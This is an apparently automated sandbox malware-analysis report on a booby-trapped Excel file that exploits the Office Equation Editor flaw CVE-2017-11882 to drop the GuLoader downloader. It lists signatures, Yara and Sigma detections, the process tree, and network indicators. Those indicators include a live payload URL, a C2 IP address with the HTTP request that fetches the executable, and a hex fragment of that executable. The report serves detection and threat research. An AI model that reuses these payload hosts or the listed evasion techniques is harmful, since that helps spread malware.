Play interactive tour

Edit tour

Windows Analysis Report MTIR21487610_0062180102_20210714081247.PDF.xlsx

Overview

General Information

Sample Name:	MTIR21487610_0062180102_20210714081247.PDF.xlsx
Analysis ID:	449166
MD5:	168c2cabea51b16aa19a152a652254f5
SHA1:	477715c6a9d3219ea85a60eac9c80af83a102357
SHA256:	9b88ac825c56b50955cbc6211bb563f7334c51c2e90e3d2bfebefed817b4ad90
Tags:	VelvetSweatshopxlsx
Infos:
Most interesting Screenshot:

Detection

GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Droppers Exploiting CVE-2017-11882

Sigma detected: EQNEDT32.EXE connecting to internet

Sigma detected: File Dropped By EQNEDT32EXE

Yara detected GuLoader

C2 URLs / IPs found in malware configuration

Contains functionality to detect hardware virtualization (CPUID execution measurement)

Detected RDTSC dummy instruction sequence (likely for instruction hammering)

Drops PE files to the user root directory

Office equation editor drops PE file

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Sigma detected: Execution from Suspicious Folder

Tries to detect virtualization through RDTSC time measurements

Abnormal high CPU Usage

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to call native functions

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Document misses a certain OLE stream usually present in this Microsoft Office document type

Downloads executable code via HTTP

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the user directory

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Office Equation Editor has been started

PE file contains strange resources

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w7x64

EXCEL.EXE (PID: 2652 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)

EQNEDT32.EXE (PID: 2184 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)

vbc.exe (PID: 2520 cmdline: 'C:\Users\Public\vbc.exe' MD5: FCFB0EC70F1419EDE8A534CC95CB61E9)

cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "http://ceattire.com/bin_UYDMbHwI28.bin"}

Yara Overview

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\Public\vbc.exe	JoeSecurity_GuLoader_1	Yara detected GuLoader	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe	JoeSecurity_GuLoader_1	Yara detected GuLoader	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000006.00000000.2144558034.0000000000401000.00000020.00020000.sdmp	JoeSecurity_GuLoader_1	Yara detected GuLoader	Joe Security
00000006.00000002.2360258562.0000000000401000.00000020.00020000.sdmp	JoeSecurity_GuLoader_1	Yara detected GuLoader	Joe Security
00000006.00000002.2360248104.00000000003E0000.00000040.00000001.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
6.0.vbc.exe.400000.0.unpack	JoeSecurity_GuLoader_1	Yara detected GuLoader	Joe Security
6.2.vbc.exe.400000.0.unpack	JoeSecurity_GuLoader_1	Yara detected GuLoader	Joe Security

Sigma Overview

Exploits:

Sigma detected: EQNEDT32.EXE connecting to internet

Show sources

Source: Network Connection

Author: Joe Security: Data: DestinationIp: 180.214.239.39, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2184, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165

Sigma detected: File Dropped By EQNEDT32EXE

Show sources

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2184, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe

System Summary:

Sigma detected: Droppers Exploiting CVE-2017-11882

Show sources

Source: Process started

Author: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2184, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2520

Sigma detected: Execution from Suspicious Folder

Show sources

Source: Process started

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 00000006.00000002.2360248104.00000000003E0000.00000040.00000001.sdmp

Malware Configuration Extractor: GuLoader {"Payload URL": "http://ceattire.com/bin_UYDMbHwI28.bin"}

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe	Virustotal: Detection: 42%	Perma Link
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe	ReversingLabs: Detection: 31%
Source: C:\Users\Public\vbc.exe	Virustotal: Detection: 42%	Perma Link
Source: C:\Users\Public\vbc.exe	ReversingLabs: Detection: 31%

Multi AV Scanner detection for submitted file

Show sources

Source: MTIR21487610_0062180102_20210714081247.PDF.xlsx

ReversingLabs: Detection: 28%

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe			Jump to behavior

Source: unknown

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:

Binary string: C:\Program Files (x86)\Administrator-Cloud\Projects\ANTISOCIA.pdb source: .svchost[1].exe.4.dr

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 180.214.239.39:80

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 180.214.239.39:80

Source: excel.exe

Memory has grown: Private usage: 4MB later: 71MB

Networking:

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: http://ceattire.com/bin_UYDMbHwI28.bin

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 15 Jul 2021 09:06:43 GMTServer: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28Last-Modified: Tue, 13 Jul 2021 17:05:39 GMTETag: "41470-5c7043f493d18"Accept-Ranges: bytesContent-Length: 267376Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c7 bf 79 da 83 de 17 89 83 de 17 89 83 de 17 89 00 c2 19 89 82 de 17 89 cc fc 1e 89 87 de 17 89 b5 f8 1a 89 82 de 17 89 52 69 63 68 83 de 17 89 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 e2 ca 46 52 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 60 03 00 00 90 00 00 00 00 00 00 70 14 00 00 00 10 00 00 00 70 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 07 00 00 00 04 00 00 00 00 00 00 00 00 00 04 00 00 10 00 00 e6 1c 04 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 04 64 03 00 28 00 00 00 00 80 03 00 92 7a 00 00 00 00 00 00 00 00 00 00 58 00 04 00 18 14 00 00 00 00 00 00 00 00 00 00 20 11 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 18 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 30 59 03 00 00 10 00 00 00 60 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 d4 0b 00 00 00 70 03 00 00 10 00 00 00 70 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 92 7a 00 00 00 80 03 00 00 80 00 00 00 80 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 c3 1f b0 49 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0

Source: Joe Sandbox View

ASN Name: VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN

Source: global traffic

HTTP traffic detected: GET /cpu/.svchost.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 180.214.239.39Connection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\300F3110.emf

Jump to behavior

Source: global traffic

Source: .svchost[1].exe.4.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: .svchost[1].exe.4.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: .svchost[1].exe.4.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: .svchost[1].exe.4.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: .svchost[1].exe.4.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: .svchost[1].exe.4.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: .svchost[1].exe.4.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: .svchost[1].exe.4.dr	String found in binary or memory: http://ocsp.digicert.com0O
Source: 300F3110.emf.0.dr	String found in binary or memory: http://www.day.com/dam/1.0
Source: .svchost[1].exe.4.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: .svchost[1].exe.4.dr	String found in binary or memory: https://www.digicert.com/CPS0

System Summary:

Office equation editor drops PE file

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe			Jump to dropped file

Source: C:\Users\Public\vbc.exe

Process Stats: CPU usage > 98%

Source: C:\Users\Public\vbc.exe	Memory allocated: 76E20000 page execute and read and write			Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76D20000 page execute and read and write			Jump to behavior

Source: C:\Users\Public\vbc.exe	Code function: 6_2_003E54E7 NtAllocateVirtualMemory,		6_2_003E54E7
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003E55AC NtAllocateVirtualMemory,		6_2_003E55AC

Source: C:\Users\Public\vbc.exe	Code function: 6_2_003E54E7	6_2_003E54E7
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003E7036	6_2_003E7036
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003E100E	6_2_003E100E
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003E4071	6_2_003E4071
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003E80D4	6_2_003E80D4
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003E2958	6_2_003E2958
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003E2940	6_2_003E2940
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003E29B0	6_2_003E29B0
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003E2183	6_2_003E2183
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003E42CD	6_2_003E42CD
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003E72C3	6_2_003E72C3
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003E1B2D	6_2_003E1B2D
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003E1B1A	6_2_003E1B1A
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003E7B73	6_2_003E7B73
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003E1B5F	6_2_003E1B5F
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003E4B8E	6_2_003E4B8E
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003E8385	6_2_003E8385
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003E43F1	6_2_003E43F1
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003E341B	6_2_003E341B
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003E844C	6_2_003E844C
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003E8C82	6_2_003E8C82
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003E8CD5	6_2_003E8CD5
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003E34C4	6_2_003E34C4
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003E350F	6_2_003E350F
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003E8D58	6_2_003E8D58
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003E7D52	6_2_003E7D52
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003E0EFE	6_2_003E0EFE
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003E3F0C	6_2_003E3F0C
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003E7F03	6_2_003E7F03
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003E7F6D	6_2_003E7F6D
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003E0FB5	6_2_003E0FB5
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003E2793	6_2_003E2793
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003E4785	6_2_003E4785

Source: MTIR21487610_0062180102_20210714081247.PDF.xlsx

OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe FF1B034C7060724133C6DF0AA8CF5411EC0E6775D3ACA83A127617340A8C588A
Source: Joe Sandbox View	Dropped File: C:\Users\Public\vbc.exe FF1B034C7060724133C6DF0AA8CF5411EC0E6775D3ACA83A127617340A8C588A

Source: .svchost[1].exe.4.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: .svchost[1].exe.4.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: .svchost[1].exe.4.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.4.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.4.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.4.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: classification engine

Classification label: mal100.troj.expl.evad.winXLSX@4/11@0/1

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$MTIR21487610_0062180102_20210714081247.PDF.xlsx

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRE205.tmp

Jump to behavior

Source: C:\Users\Public\vbc.exe

Section loaded: C:\Windows\SysWOW64\msvbvm60.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\Public\vbc.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: MTIR21487610_0062180102_20210714081247.PDF.xlsx

ReversingLabs: Detection: 28%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: MTIR21487610_0062180102_20210714081247.PDF.xlsx

Static file information: File size 1268792 > 1048576

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:

Binary string: C:\Program Files (x86)\Administrator-Cloud\Projects\ANTISOCIA.pdb source: .svchost[1].exe.4.dr

Source: MTIR21487610_0062180102_20210714081247.PDF.xlsx

Initial sample: OLE indicators vbamacros = False

Source: MTIR21487610_0062180102_20210714081247.PDF.xlsx

Initial sample: OLE indicators encrypted = True

Data Obfuscation:

Yara detected GuLoader

Show sources

Source: Yara match

File source: 00000006.00000002.2360248104.00000000003E0000.00000040.00000001.sdmp, type: MEMORY

Yara detected GuLoader

Show sources

Source: Yara match	File source: 6.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000000.2144558034.0000000000401000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2360258562.0000000000401000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\Public\vbc.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe, type: DROPPED

Source: C:\Users\Public\vbc.exe	Code function: 6_2_0040495E push es; ret	6_2_00404963
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00221774 push edx; ret	6_2_002217A1
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00221023 push edx; ret	6_2_00221051
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00222823 push edx; ret	6_2_00222851
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00224023 push edx; ret	6_2_00224051
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00227024 push edx; ret	6_2_00227051
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00225825 push edx; ret	6_2_00225851
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00224833 push edx; ret	6_2_00224861
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00223033 push edx; ret	6_2_00223061
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00221833 push edx; ret	6_2_00221861
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00226034 push edx; ret	6_2_00226061
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00220038 push edx; ret	6_2_00220061
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00224803 push edx; ret	6_2_00224831
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00223003 push edx; ret	6_2_00223031
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00221803 push edx; ret	6_2_00221831
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00226004 push edx; ret	6_2_00226031
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00220008 push edx; ret	6_2_00220031
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00223813 push edx; ret	6_2_00223841
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00225013 push edx; ret	6_2_00225041
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00222014 push edx; ret	6_2_00222041
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00226814 push edx; ret	6_2_00226841
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00220818 push edx; ret	6_2_00220841
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00223063 push edx; ret	6_2_00223091
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00221863 push edx; ret	6_2_00221891
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00224863 push edx; ret	6_2_00224891
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00226065 push edx; ret	6_2_00226091
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00220068 push edx; ret	6_2_00220091
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00222074 push edx; ret	6_2_002220A1
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00223874 push edx; ret	6_2_002238A1
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00225074 push edx; ret	6_2_002250A1
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00226875 push edx; ret	6_2_002268A1

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe			Jump to dropped file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Boot Survival:

Drops PE files to the user root directory

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
